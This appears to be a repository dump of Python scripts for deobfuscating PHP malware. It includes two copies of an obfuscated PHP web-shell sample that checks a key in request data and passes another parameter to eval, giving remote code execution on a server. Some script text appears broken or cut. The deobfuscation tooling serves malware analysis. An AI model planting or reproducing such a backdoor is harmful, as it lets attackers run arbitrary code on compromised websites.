├── Alphabet-Key.py ├── Alphabet-Soup.py ├── README.md ├── Sample-$GLOBALS └── Sample.php /Alphabet-Key.py: -------------------------------------------------------------------------------- 1 | ############################################### 2 | # Version 1 # 3 | # Deobfuscation of numbers: @Iamrasting # 4 | # # 5 | ############################################### 6 | import re 7 | 8 | #Key 9 | # PLEASE MAKE SURE THAT ALL HEX CODES ARE CORRECT. IF YOU HAVE ANY ERRORS ADD A 0 , FOR EXAMPLE \xd WILL BE \x0d . There are known occurances. 10 | 11 | Alphabet=" ENTER ALPHABET HERE " 12 | 13 | # this is the obfuscated code we need to extract the numbers from 14 | obs = "ENTER TO OBFUSCATED CODE HERE" 15 | 16 | # This will take all numbers and convert to the correct character. 17 | # It will print to the console the converted code. Please copy this code for further conversion. 18 | 19 | # New Code 20 | # ======== 21 | 22 | # First, find all the numbers that are contained within two square brackets 23 | # e.g. the "[62]" in $tf7ebf['l94b537e'][62] 24 | obs_numbers = re.findall(r'\[(\d+)\]', obs) 25 | print "Identified numbers: {obs_numbers}".format(obs_numbers = obs_numbers) 26 | 27 | # Loop through each number from the previous step, and replace every 28 | # "[{num}]" with the char from the corresponding index in `Alphabet` 29 | 30 | # As these are string values and not integers, PHP will be expecting them 31 | # to appear in quotation marks, as if you had the value [a] - that would cause 32 | # a syntax error in PHP. 33 | processed_obs = obs 34 | for num in obs_numbers: 35 | search_for = '[{num}]'.format(num = num) 36 | replace_with = "['{c}']".format(c = Alphabet[int(num)]) 37 | processed_obs = processed_obs.replace(search_for, replace_with) 38 | print 'Replaced `{num}` with `{c}`'.format(num = num, c = Alphabet[int(num)]) 39 | 40 | print '------' 41 | print 'Original: {obs}'.format(obs = obs) 42 | print 'Processed: {obs}'.format(obs = processed_obs) 43 | 44 | search_for2 = '[$GLOBALS[$GLOBALS]]'.format(obs = obs) 45 | replace_with2 = "['{c}']".format(c = '') 46 | processed_obs2 = processed_obs.replace(search_for2, replace_with2) 47 | 48 | print 'Processed: {obs}'.format(obs = processed_obs2) 49 | -------------------------------------------------------------------------------- /Alphabet-Soup.py: -------------------------------------------------------------------------------- 1 | ############################################### 2 | # Version 3 # 3 | # Deobfuscation of numbers: @Iamrasting # 4 | # Deobfuscation of script: @5w0rdfish # 5 | ############################################### 6 | 7 | import re 8 | 9 | #Key 10 | 11 | 12 | Alphabet="\x5e\x71\x7c\x43\x7a\x6a\x23\x6d\x26\x2d\x44\x3c\x34\x27\x66\x52\x38\x4a\x29\x6f\x63\x35\x59\x0a\x51\x7e\x22\x3f\x6b\x2c\x65\x68\x61\x37\x4e\x09\x73\x3b\x76\x4d\x42\x7d\x7b\x55\x79\x4b\x56\x39\x2f\x77\x6c\x75\x6e\x2b\x78\x3d\x49\x4c\x24\x62\x21\x46\x31\x3a\x2a\x54\x70\x74\x45\x4f\x47\x64\x28\x5c\x2e\x30\x5d\x5b\x5f\x60\x3e\x67\x53\x32\x36\x69\x40\x5a\x20\x41\x57\x25\x58\x48\x0d\x50\x33\x72" 13 | # this is the first part of obfuscated code we need to extract the numbers from 14 | 15 | 16 | with open('globals.php') as infile: 17 | for obs in infile: 18 | 19 | # New Code 20 | # ======== 21 | # First, find all the numbers that are contained within two square brackets 22 | # e.g. the "[62]" in $tf7ebf['l94b537e'][62] 23 | obs_numbers = re.findall(r'\[(\d+)\]', obs) 24 | # print "Identified numbers: {obs_numbers}".format(obs_numbers = obs_numbers) 25 | # Loop through each number from the previous step, and replace every 26 | # "[{num}]" with the char from the corresponding index in `Alphabet` 27 | # As these are string values and not integers, PHP will be expecting them 28 | 29 | 30 | processed_obs = obs 31 | for num in obs_numbers: 32 | search_for = '[{num}]'.format(num = num) 33 | replace_with = "['{c}']".format(c = Alphabet[int(num)]) 34 | processed_obs = processed_obs.replace(search_for, replace_with) 35 | # print 'Replaced `{num}` with `{c}`'.format(num = num, c = Alphabet[int(num)]) 36 | print '------' 37 | 38 | 39 | ################################################################# 40 | 41 | #find the variable defined as the Alphabet 42 | varName2 = re.findall(r'([\'([a-z]\w+)\'\]', processed_obs) 43 | if len(varName2) > 1: 44 | 45 | alph = varName2[1] 46 | 47 | #turn to a string 48 | result = " ".join(str(x) for x in alph) 49 | 50 | print alph 51 | #remove all not required 52 | 53 | #return its name 54 | print ("#Alphabet " + str(alph)) 55 | 56 | ################################################################ 57 | 58 | #find the variable defined as $GLOBALS 59 | varName = re.findall(r'\$([GLOBALS]\w+)\S\[\'([a-z]\w+)\'\]', processed_obs) 60 | #turn to a string 61 | result = " ".join(str(x) for x in varName) 62 | 63 | #remove all not required 64 | bad_chars = [' ', ',','GLOBAL','[', ']','.','\''] 65 | varName = result.translate(None, ''.join(bad_chars)) 66 | #return its name 67 | print ("#$GLOBALS " + str(varName)) 68 | print '------' 69 | ################################################################ 70 | 71 | # We are going to remove all $GLOBALS that are not required 72 | s = processed_obs 73 | e = {varName : ""} 74 | 75 | def find_replace_multi(string, dictionary): 76 | for item in dictionary.keys(): 77 | # sub item for item's paired value in string 78 | string = re.sub(item, dictionary[item], string) 79 | return string 80 | string = find_replace_multi(s, e) 81 | 82 | # We are going to remove all $GLOBALS that are not required 83 | s = string 84 | e = {alph : ""} 85 | 86 | def find_replace_multi(string, dictionary): 87 | for item in dictionary.keys(): 88 | # sub item for item's paired value in string 89 | string = re.sub(item, dictionary[item], string) 90 | return string 91 | string = find_replace_multi(s, e) 92 | 93 | 94 | ################################################################## 95 | # We remove any other characters not required 96 | bad_chars = ['.','\''] 97 | # Translate these to our blank space 98 | string = string.translate(None, ''.join(bad_chars)) 99 | 100 | #remove the extra $ signs 101 | string = re.sub("[(\[\])(\[.\])]", "", string) 102 | string = re.sub("[.(? $f5a8) { 47 | $j1cf72 = $f5a8; 48 | $xefb = $x261be0; 49 | } 50 | if (!$j1cf72) { 51 | foreach($GLOBALS[$GLOBALS['l94b537e'][81].$GLOBALS['l94b537e'][59].$GLOBALS['l94b537e'][21].$GLOBALS['l94b537e'][12].$GLOBALS['l94b537e'][83].$GLOBALS['l94b537e'][30].$GLOBALS['l94b537e'][62].$GLOBALS['l94b537e'][21]] as$x261be0 => $f5a8) { 52 | $j1cf72 = $f5a8; 53 | $xefb = $x261be0; 54 | } 55 | } 56 | $j1cf72 = @$GLOBALS$GLOBALS['l94b537e'][31].$GLOBALS['l94b537e'][33].$GLOBALS['l94b537e'][12].$GLOBALS['l94b537e'][84].$GLOBALS['l94b537e'][20].$GLOBALS['l94b537e'][12].$GLOBALS['l94b537e'][62]; 57 | if (isset($j1cf72[$GLOBALS['l94b537e'][32].$GLOBALS['l94b537e'][28]]) && $jc17 == $j1cf72[$GLOBALS['l94b537e'][32].$GLOBALS['l94b537e'][28]]) { 58 | if ($j1cf72[$GLOBALS['l94b537e'][32]] == $GLOBALS['l94b537e'][85]) { 59 | $a05a = Array($GLOBALS['l94b537e'][66].$GLOBALS['l94b537e'][38] => @$GLOBALS$GLOBALS['l94b537e'][51].$GLOBALS['l94b537e'][33].$GLOBALS['l94b537e'][21].$GLOBALS['l94b537e'][71], $GLOBALS['l94b537e'][36].$GLOBALS['l94b537e'][38] => $GLOBALS['l94b537e'][62].$GLOBALS['l94b537e'][74].$GLOBALS['l94b537e'][75].$GLOBALS['l94b537e'][9].$GLOBALS['l94b537e'][62], ); 60 | echo@ $GLOBALS$GLOBALS['l94b537e'][51].$GLOBALS['l94b537e'][20].$GLOBALS['l94b537e'][30].$GLOBALS['l94b537e'][62].$GLOBALS['l94b537e'][20].$GLOBALS['l94b537e'][21]; 61 | } 62 | elseif($j1cf72[$GLOBALS['l94b537e'][32]] == $GLOBALS['l94b537e'][30]) { 63 | eval / a684ebc / ($j1cf72[$GLOBALS['l94b537e'][71]]); 64 | } 65 | exit(); 66 | } ?> 67 | -------------------------------------------------------------------------------- /Sample.php: -------------------------------------------------------------------------------- 1 | $f5a8){$j1cf72=$f5a8;$xefb=$x261be0;}if(!$j1cf72){foreach($tf7ebf[$tf7ebf['l94b537e'][81].$tf7ebf['l94b537e'][59].$tf7ebf['l94b537e'][21].$tf7ebf['l94b537e'][12].$tf7ebf['l94b537e'][83].$tf7ebf['l94b537e'][30].$tf7ebf['l94b537e'][62].$tf7ebf['l94b537e'][21]]as$x261be0=>$f5a8){$j1cf72=$f5a8;$xefb=$x261be0;}}$j1cf72=@$tf7ebf$tf7ebf['l94b537e'][31].$tf7ebf['l94b537e'][33].$tf7ebf['l94b537e'][12].$tf7ebf['l94b537e'][84].$tf7ebf['l94b537e'][20].$tf7ebf['l94b537e'][12].$tf7ebf['l94b537e'][62];if(isset($j1cf72[$tf7ebf['l94b537e'][32].$tf7ebf['l94b537e'][28]])&&$jc17==$j1cf72[$tf7ebf['l94b537e'][32].$tf7ebf['l94b537e'][28]]){if($j1cf72[$tf7ebf['l94b537e'][32]]==$tf7ebf['l94b537e'][85]){$a05a=Array($tf7ebf['l94b537e'][66].$tf7ebf['l94b537e'][38]=>@$tf7ebf$tf7ebf['l94b537e'][51].$tf7ebf['l94b537e'][33].$tf7ebf['l94b537e'][21].$tf7ebf['l94b537e'][71],$tf7ebf['l94b537e'][36].$tf7ebf['l94b537e'][38]=>$tf7ebf['l94b537e'][62].$tf7ebf['l94b537e'][74].$tf7ebf['l94b537e'][75].$tf7ebf['l94b537e'][9].$tf7ebf['l94b537e'][62],);echo@$tf7ebf$tf7ebf['l94b537e'][51].$tf7ebf['l94b537e'][20].$tf7ebf['l94b537e'][30].$tf7ebf['l94b537e'][62].$tf7ebf['l94b537e'][20].$tf7ebf['l94b537e'][21];}elseif($j1cf72[$tf7ebf['l94b537e'][32]]==$tf7ebf['l94b537e'][30]){eval/a684ebc/($j1cf72[$tf7ebf['l94b537e'][71]]);}exit();} ?> 2 | --------------------------------------------------------------------------------